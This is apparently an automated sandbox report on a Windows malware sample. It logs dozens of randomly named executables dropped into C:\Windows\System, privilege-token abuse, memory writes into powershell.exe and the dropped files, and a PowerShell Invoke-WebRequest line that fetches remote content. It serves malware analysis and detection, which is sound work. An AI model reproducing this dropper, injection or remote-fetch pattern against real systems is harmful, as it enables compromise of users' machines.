File created C:\Windows\System\LhwOtbW.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ufkXsCI.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\FuNTKIn.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\BlMtzaD.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ZAvorde.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\KXNYEiq.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\SLyCNWS.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\OpcdrdU.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\vvczuDF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\QpurUrt.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\irgeZpL.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\aKRiMaF.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\dLuaxLf.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\LOZhOLw.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\guBAAhi.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\vZbWKKH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\QnsDCgx.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\QWdOGFa.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\vepSsnW.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\gemtUrG.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\owpXnUh.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\wdzNDkc.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\CKbYiqK.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\liOAaaM.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\Alpwide.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\grileVY.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\coeBpRH.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\sNblEoh.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\wKRPUzw.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\qETXegs.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ktzkHdP.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\kzPrsnY.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\ruPJLBk.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\tYryzjk.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
File created C:\Windows\System\NwyGxeg.exe C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4844 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 2740 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4844 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\BbILbNR.exe
PID 4844 wrote to memory of 4772 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\BbILbNR.exe
PID 4844 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\YSzmzNr.exe
PID 4844 wrote to memory of 2400 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\YSzmzNr.exe
PID 4844 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\sNPBSte.exe
PID 4844 wrote to memory of 3060 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\sNPBSte.exe
PID 4844 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OcvtfSa.exe
PID 4844 wrote to memory of 3532 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OcvtfSa.exe
PID 4844 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\cDlKgIM.exe
PID 4844 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\cDlKgIM.exe
PID 4844 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\XvSovNm.exe
PID 4844 wrote to memory of 1404 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\XvSovNm.exe
PID 4844 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\RmbuPMS.exe
PID 4844 wrote to memory of 3308 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\RmbuPMS.exe
PID 4844 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\AifRhrl.exe
PID 4844 wrote to memory of 400 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\AifRhrl.exe
PID 4844 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\jmolJex.exe
PID 4844 wrote to memory of 1392 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\jmolJex.exe
PID 4844 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\yzyFNDu.exe
PID 4844 wrote to memory of 4640 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\yzyFNDu.exe
PID 4844 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\TWfBhyl.exe
PID 4844 wrote to memory of 3620 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\TWfBhyl.exe
PID 4844 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\dMVezvJ.exe
PID 4844 wrote to memory of 864 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\dMVezvJ.exe
PID 4844 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\hMFYspB.exe
PID 4844 wrote to memory of 3236 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\hMFYspB.exe
PID 4844 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\CKvnawf.exe
PID 4844 wrote to memory of 3328 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\CKvnawf.exe
PID 4844 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OpcdrdU.exe
PID 4844 wrote to memory of 2648 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OpcdrdU.exe
PID 4844 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\PJkIOfS.exe
PID 4844 wrote to memory of 4512 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\PJkIOfS.exe
PID 4844 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\ewLPSlc.exe
PID 4844 wrote to memory of 2536 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\ewLPSlc.exe
PID 4844 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\ImsojAq.exe
PID 4844 wrote to memory of 3352 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\ImsojAq.exe
PID 4844 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OBieAyf.exe
PID 4844 wrote to memory of 4248 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\OBieAyf.exe
PID 4844 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\SSEAqWy.exe
PID 4844 wrote to memory of 3756 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\SSEAqWy.exe
PID 4844 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UZuLrCf.exe
PID 4844 wrote to memory of 4952 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UZuLrCf.exe
PID 4844 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\WsNTkOU.exe
PID 4844 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\WsNTkOU.exe
PID 4844 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\YsxoCUY.exe
PID 4844 wrote to memory of 1748 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\YsxoCUY.exe
PID 4844 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UMYLiIQ.exe
PID 4844 wrote to memory of 3588 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UMYLiIQ.exe
PID 4844 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\LwONxde.exe
PID 4844 wrote to memory of 4544 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\LwONxde.exe
PID 4844 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\rHAvdEG.exe
PID 4844 wrote to memory of 1020 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\rHAvdEG.exe
PID 4844 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UiRrkAA.exe
PID 4844 wrote to memory of 2180 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\UiRrkAA.exe
PID 4844 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\bqdBunV.exe
PID 4844 wrote to memory of 3884 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\bqdBunV.exe
PID 4844 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\yCxjQNU.exe
PID 4844 wrote to memory of 3616 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\yCxjQNU.exe
PID 4844 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\veiZvSY.exe
PID 4844 wrote to memory of 336 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\veiZvSY.exe
PID 4844 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\xSKtnqe.exe
PID 4844 wrote to memory of 3916 N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe C:\Windows\System\xSKtnqe.exe

Processes

C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "

C:\Windows\System\BbILbNR.exe

C:\Windows\System\BbILbNR.exe

C:\Windows\System\YSzmzNr.exe

C:\Windows\System\YSzmzNr.exe

C:\Windows\System\sNPBSte.exe

C:\Windows\System\sNPBSte.exe

C:\Windows\System\OcvtfSa.exe

C:\Windows\System\OcvtfSa.exe

C:\Windows\System\cDlKgIM.exe

C:\Windows\System\cDlKgIM.exe

C:\Windows\System\XvSovNm.exe

C:\Windows\System\XvSovNm.exe

C:\Windows\System\RmbuPMS.exe

C:\Windows\System\RmbuPMS.exe

C:\Windows\System\AifRhrl.exe

C:\Windows\System\AifRhrl.exe

C:\Windows\System\jmolJex.exe

C:\Windows\System\jmolJex.exe

C:\Windows\System\yzyFNDu.exe

C:\Windows\System\yzyFNDu.exe

C:\Windows\System\TWfBhyl.exe

C:\Windows\System\TWfBhyl.exe

C:\Windows\System\dMVezvJ.exe

C:\Windows\System\dMVezvJ.exe

C:\Windows\System\hMFYspB.exe

C:\Windows\System\hMFYspB.exe

C:\Windows\System\CKvnawf.exe

C:\Windows\System\CKvnawf.exe

C:\Windows\System\OpcdrdU.exe

C:\Windows\System\OpcdrdU.exe

C:\Windows\System\PJkIOfS.exe

C:\Windows\System\PJkIOfS.exe

C:\Windows\System\ewLPSlc.exe

C:\Windows\System\ewLPSlc.exe

C:\Windows\System\ImsojAq.exe

C:\Windows\System\ImsojAq.exe

C:\Windows\System\OBieAyf.exe

C:\Windows\System\OBieAyf.exe

C:\Windows\System\SSEAqWy.exe

C:\Windows\System\SSEAqWy.exe

C:\Windows\System\UZuLrCf.exe

C:\Windows\System\UZuLrCf.exe

C:\Windows\System\WsNTkOU.exe

C:\Windows\System\WsNTkOU.exe

C:\Windows\System\YsxoCUY.exe

C:\Windows\System\YsxoCUY.exe

C:\Windows\System\UMYLiIQ.exe

C:\Windows\System\UMYLiIQ.exe

C:\Windows\System\LwONxde.exe

C:\Windows\System\LwONxde.exe

C:\Windows\System\rHAvdEG.exe

C:\Windows\System\rHAvdEG.exe

C:\Windows\System\UiRrkAA.exe

C:\Windows\System\UiRrkAA.exe

C:\Windows\System\bqdBunV.exe

C:\Windows\System\bqdBunV.exe

C:\Windows\System\yCxjQNU.exe

C:\Windows\System\yCxjQNU.exe

C:\Windows\System\veiZvSY.exe

C:\Windows\System\veiZvSY.exe

C:\Windows\System\xSKtnqe.exe

C:\Windows\System\xSKtnqe.exe

C:\Windows\System\GDMbIJy.exe

C:\Windows\System\GDMbIJy.exe

C:\Windows\System\pFdsJzJ.exe

C:\Windows\System\pFdsJzJ.exe

C:\Windows\System\NRSJYQY.exe

C:\Windows\System\NRSJYQY.exe

C:\Windows\System\kudxvcG.exe

C:\Windows\System\kudxvcG.exe

C:\Windows\System\vAyXyze.exe

C:\Windows\System\vAyXyze.exe

C:\Windows\System\aaDWODH.exe

C:\Windows\System\aaDWODH.exe

C:\Windows\System\rBeulIc.exe

C:\Windows\System\rBeulIc.exe

C:\Windows\System\VjZFZfk.exe

C:\Windows\System\VjZFZfk.exe

C:\Windows\System\BPdaQpx.exe

C:\Windows\System\BPdaQpx.exe

C:\Windows\System\CLpPKqz.exe

C:\Windows\System\CLpPKqz.exe

C:\Windows\System\CcaJvKP.exe

C:\Windows\System\CcaJvKP.exe

C:\Windows\System\CuzYLen.exe

C:\Windows\System\CuzYLen.exe

C:\Windows\System\xjNUBAg.exe

C:\Windows\System\xjNUBAg.exe

C:\Windows\System\qEvKjnO.exe

C:\Windows\System\qEvKjnO.exe

C:\Windows\System\SWFNthQ.exe

C:\Windows\System\SWFNthQ.exe

C:\Windows\System\ozziSUh.exe

C:\Windows\System\ozziSUh.exe

C:\Windows\System\gqhuACd.exe

C:\Windows\System\gqhuACd.exe

C:\Windows\System\NfIjDUa.exe

C:\Windows\System\NfIjDUa.exe

C:\Windows\System\MiwOIvH.exe

C:\Windows\System\MiwOIvH.exe

C:\Windows\System\XUGyOPf.exe

C:\Windows\System\XUGyOPf.exe

C:\Windows\System\wEWejht.exe

C:\Windows\System\wEWejht.exe

C:\Windows\System\bYjSWxn.exe

C:\Windows\System\bYjSWxn.exe

C:\Windows\System\FQFoqag.exe

C:\Windows\System\FQFoqag.exe

C:\Windows\System\XgcCnUF.exe

C:\Windows\System\XgcCnUF.exe

C:\Windows\System\liOAaaM.exe

C:\Windows\System\liOAaaM.exe

C:\Windows\System\KRsDfBu.exe

C:\Windows\System\KRsDfBu.exe

C:\Windows\System\oPeRwhc.exe

C:\Windows\System\oPeRwhc.exe

C:\Windows\System\gSTQiqp.exe

C:\Windows\System\gSTQiqp.exe

C:\Windows\System\QRQjcvS.exe

C:\Windows\System\QRQjcvS.exe

C:\Windows\System\PgotAzJ.exe

C:\Windows\System\PgotAzJ.exe

C:\Windows\System\pAKuoIM.exe

C:\Windows\System\pAKuoIM.exe

C:\Windows\System\aJYpXFU.exe

C:\Windows\System\aJYpXFU.exe

C:\Windows\System\MVQdaEj.exe

C:\Windows\System\MVQdaEj.exe

C:\Windows\System\cXGIHox.exe

C:\Windows\System\cXGIHox.exe

C:\Windows\System\GWRpeUC.exe

C:\Windows\System\GWRpeUC.exe

C:\Windows\System\ZWGlRVy.exe

C:\Windows\System\ZWGlRVy.exe

C:\Windows\System\xMncWzq.exe

C:\Windows\System\xMncWzq.exe

C:\Windows\System\zHAKLWZ.exe

C:\Windows\System\zHAKLWZ.exe

C:\Windows\System\ObeXwKZ.exe

C:\Windows\System\ObeXwKZ.exe

C:\Windows\System\BMxRrrc.exe

C:\Windows\System\BMxRrrc.exe

C:\Windows\System\YRcurpY.exe

C:\Windows\System\YRcurpY.exe

C:\Windows\System\tkfEhnJ.exe

C:\Windows\System\tkfEhnJ.exe

C:\Windows\System\AtyHLnm.exe

C:\Windows\System\AtyHLnm.exe

C:\Windows\System\plSHZGs.exe

C:\Windows\System\plSHZGs.exe

C:\Windows\System\wlHXLiO.exe

C:\Windows\System\wlHXLiO.exe

C:\Windows\System\PYQZrmo.exe

C:\Windows\System\PYQZrmo.exe

C:\Windows\System\kMHTptR.exe

C:\Windows\System\kMHTptR.exe

C:\Windows\System\vTgoRkY.exe

C:\Windows\System\vTgoRkY.exe

C:\Windows\System\uXPlfLi.exe

C:\Windows\System\uXPlfLi.exe

C:\Windows\System\ZxqLrYF.exe

C:\Windows\System\ZxqLrYF.exe

C:\Windows\System\UOeEMlO.exe

C:\Windows\System\UOeEMlO.exe

C:\Windows\System\LgfKTmW.exe

C:\Windows\System\LgfKTmW.exe

C:\Windows\System\QVelxtJ.exe

C:\Windows\System\QVelxtJ.exe

C:\Windows\System\UrlAzxA.exe

C:\Windows\System\UrlAzxA.exe

C:\Windows\System\LySBnLB.exe

C:\Windows\System\LySBnLB.exe

C:\Windows\System\WEvAFko.exe

C:\Windows\System\WEvAFko.exe

C:\Windows\System\SPFCqFo.exe

C:\Windows\System\SPFCqFo.exe

C:\Windows\System\bFzYHLL.exe

C:\Windows\System\bFzYHLL.exe

C:\Windows\System\MhqfGXl.exe

C:\Windows\System\MhqfGXl.exe

C:\Windows\System\ImyIvnU.exe

C:\Windows\System\ImyIvnU.exe

C:\Windows\System\hVAmsPT.exe

C:\Windows\System\hVAmsPT.exe

C:\Windows\System\DCQCqcY.exe

C:\Windows\System\DCQCqcY.exe

C:\Windows\System\DqXBpwv.exe

C:\Windows\System\DqXBpwv.exe

C:\Windows\System\TNmfzEq.exe

C:\Windows\System\TNmfzEq.exe

C:\Windows\System\ugXKBHe.exe

C:\Windows\System\ugXKBHe.exe

C:\Windows\System\zBSOuAF.exe

C:\Windows\System\zBSOuAF.exe

C:\Windows\System\MenJoaH.exe

C:\Windows\System\MenJoaH.exe

C:\Windows\System\CJvnbfq.exe

C:\Windows\System\CJvnbfq.exe

C:\Windows\System\CYIUGjy.exe

C:\Windows\System\CYIUGjy.exe

C:\Windows\System\jNvyZJW.exe

C:\Windows\System\jNvyZJW.exe

C:\Windows\System\yONiLmf.exe

C:\Windows\System\yONiLmf.exe

C:\Windows\System\bjfPVVT.exe

C:\Windows\System\bjfPVVT.exe

C:\Windows\System\WDhNoRZ.exe

C:\Windows\System\WDhNoRZ.exe

C:\Windows\System\OkxwVnA.exe

C:\Windows\System\OkxwVnA.exe

C:\Windows\System\LhwOtbW.exe

C:\Windows\System\LhwOtbW.exe

C:\Windows\System\DEMqDuY.exe

C:\Windows\System\DEMqDuY.exe

C:\Windows\System\yCwrYqm.exe

C:\Windows\System\yCwrYqm.exe

C:\Windows\System\BiVllLq.exe

C:\Windows\System\BiVllLq.exe

C:\Windows\System\uaOInBr.exe

C:\Windows\System\uaOInBr.exe

C:\Windows\System\FJmWJMY.exe

C:\Windows\System\FJmWJMY.exe

C:\Windows\System\aTinJfc.exe

C:\Windows\System\aTinJfc.exe

C:\Windows\System\Alpwide.exe

C:\Windows\System\Alpwide.exe

C:\Windows\System\hzWZGPQ.exe

C:\Windows\System\hzWZGPQ.exe

C:\Windows\System\ZAvorde.exe

C:\Windows\System\ZAvorde.exe

C:\Windows\System\xTzYueX.exe

C:\Windows\System\xTzYueX.exe

C:\Windows\System\GCnbqoP.exe

C:\Windows\System\GCnbqoP.exe

C:\Windows\System\KSUzpYD.exe

C:\Windows\System\KSUzpYD.exe

C:\Windows\System\aqnxVff.exe

C:\Windows\System\aqnxVff.exe

C:\Windows\System\jDDNLhF.exe

C:\Windows\System\jDDNLhF.exe

C:\Windows\System\sogpoyA.exe

C:\Windows\System\sogpoyA.exe

C:\Windows\System\ndZlVml.exe

C:\Windows\System\ndZlVml.exe

C:\Windows\System\nRKmtKE.exe

C:\Windows\System\nRKmtKE.exe

C:\Windows\System\vvczuDF.exe

C:\Windows\System\vvczuDF.exe

C:\Windows\System\cBCinJV.exe

C:\Windows\System\cBCinJV.exe

C:\Windows\System\zvDRVFl.exe

C:\Windows\System\zvDRVFl.exe

C:\Windows\System\ktzkHdP.exe

C:\Windows\System\ktzkHdP.exe

C:\Windows\System\nxgnYah.exe

C:\Windows\System\nxgnYah.exe

C:\Windows\System\aUVndrE.exe

C:\Windows\System\aUVndrE.exe

C:\Windows\System\KVlLIxx.exe

C:\Windows\System\KVlLIxx.exe

C:\Windows\System\AiUhnGu.exe

C:\Windows\System\AiUhnGu.exe

C:\Windows\System\fsAOTop.exe

C:\Windows\System\fsAOTop.exe

C:\Windows\System\Lqdqrpu.exe

C:\Windows\System\Lqdqrpu.exe

C:\Windows\System\WNrUKSo.exe

C:\Windows\System\WNrUKSo.exe

C:\Windows\System\wCHfaht.exe

C:\Windows\System\wCHfaht.exe

C:\Windows\System\uPbnYho.exe

C:\Windows\System\uPbnYho.exe

C:\Windows\System\TYLgWHz.exe

C:\Windows\System\TYLgWHz.exe

C:\Windows\System\zVuAppP.exe

C:\Windows\System\zVuAppP.exe

C:\Windows\System\NGFxFLL.exe

C:\Windows\System\NGFxFLL.exe

C:\Windows\System\rfSpZkd.exe

C:\Windows\System\rfSpZkd.exe

C:\Windows\System\kDVGXRP.exe

C:\Windows\System\kDVGXRP.exe

C:\Windows\System\VHwsKyy.exe

